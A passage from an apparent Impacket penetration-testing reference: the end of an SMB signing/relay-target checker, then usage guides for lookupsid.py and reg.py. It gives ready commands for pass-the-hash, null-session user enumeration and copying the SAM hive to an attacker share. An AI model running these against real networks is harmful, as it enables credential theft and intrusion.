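            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return relay_verdict(data)


def _fake_response(security_mode, dialect=0x0210):
    """Constructed NEGOTIATE response: header with the response flag set, 65-byte body."""
    hdr = bytearray(smb2_header(command=0))
    struct.pack_into("<I", hdr, 16, FLAG_RESPONSE)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0) + b"\x00"
    return bytes(hdr) + body


if __name__ == "__main__":
    # Offline demonstration; for a live host call probe("10.0.0.5").
    print("member server:", relay_verdict(_fake_response(SIGNING_ENABLED)))
    print("domain controller:", relay_verdict(_fake_response(SIGNING_ENABLED | SIGNING_REQUIRED)))
```

On a real network the same list is produced by netexec smb <range> --gen-relay-list targets.txt or nmap -p445 --script smb2-security-mode; the point of the code is to show what those tools check. Newer Windows releases (Windows 11 24H2, Server 2025) require SMB signing by default, so the set of relayable member hosts shrinks over time.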

lookupsid.py

Enumerates users, groups and machine accounts by brute-forcing RIDs: it opens the LSARPC interface over SMB, obtains the domain SID with LsarQueryInformationPolicy and then resolves SID-RID pairs up to maxRid with LsarLookupSids. Any authenticated user can do this (and, on hosts that still allow null sessions, no credentials are needed at all). The first line of output is the domain SID that ticketer.py needs.

Basic Usage

lookupsid.py [[domain/]username[:password]@]target [maxRid] [options]

Common Options

Option Description
maxRid Highest RID to check (positional, default: 4000)
-hashes LMHASH:NTHASH Use NTLM hashes instead of a password (Pass-the-Hash)
-no-pass Don't ask for a password (use for null-session attempts or with -k)
-k Use Kerberos authentication
-dc-ip IP IP address of the domain controller (when the target is given as a domain name)
-debug Turn DEBUG output ON

Examples

# Enumerate SIDs with explicit credentials, checking RIDs up to 20000 (large domains exceed the default 4000)
lookupsid.py administrator:Password123@192.168.1.100 20000

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use a hash instead of a password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Try without credentials (null session; only works on hosts that still allow anonymous LSARPC access)
lookupsid.py -no-pass anonymous@192.168.1.100

reg.py

Provides a remote registry manipulation tool.

Basic Usage

reg.py [domain/]username[:password]@target [options] {query,add,delete,save} [params]

Common Options

Option Description
-hashes LMHASH:NTHASH Use NTLM hashes instead of password (Pass-the-Hash)
-debug Turn DEBUG output ON

Actions

Action Description
query Query a key (-keyName KEY) or a single value (-v NAME); -s recurses into subkeys
add Add a value: -keyName KEY -v NAME -vt TYPE (REG_SZ, REG_DWORD, ...) -vd DATA
delete Delete a key (-keyName KEY) or a single value (-v NAME); -va deletes all values under the key
save Save a hive (-keyName HKLM\SAM, HKLM\SYSTEM, ...) to a UNC path the target can write to (-o \\host\share)

Requires administrator rights and the Remote Registry service, which the tool starts if it is stopped. Quote key paths in the shell so the backslashes survive.

Examples

# Query a registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion'

# Add a registry value with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName 'HKLM\SOFTWARE\Test' -v TestValue -vt REG_SZ -vd "Test Data"

# Delete a registry key with a hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName 'HKLM\SOFTWARE\Test'

# Save the SAM hive to a share you control (pair with SYSTEM for secretsdump.py -sam ... -system ... LOCAL)
reg.py administrator:Password123@192.168.1.100 save -keyName 'HKLM\SAM' -o '\\192.168.1.50\share'

Common Parameters Across Tools

Parameter Description
-h, --help Show the help message and exit
-debug Turn DEBUG output ON
-hashes LMHASH:NTHASH NTLM hashes in LMHASH:NTHASH form; the LM half may be left empty (:NTHASH)
-no-pass Don't ask for a password (use with -k, or for an empty password)
-k Use Kerberos authentication: credentials come from the ccache named by KRB5CCNAME (or from a password/hash/AES key if given); the target must be a hostname that matches the service ticket's SPN, so use -target-ip when that name does not resolve
-aesKey KEY AES key to use for Kerberos authentication (128 or 256 bit, hex)
-dc-ip IP IP address of the domain controller (when the domain name does not resolve)
-target-ip IP IP address of the target machine (when the name given in the target does not resolve)
-port [port] Destination port to connect to

Resources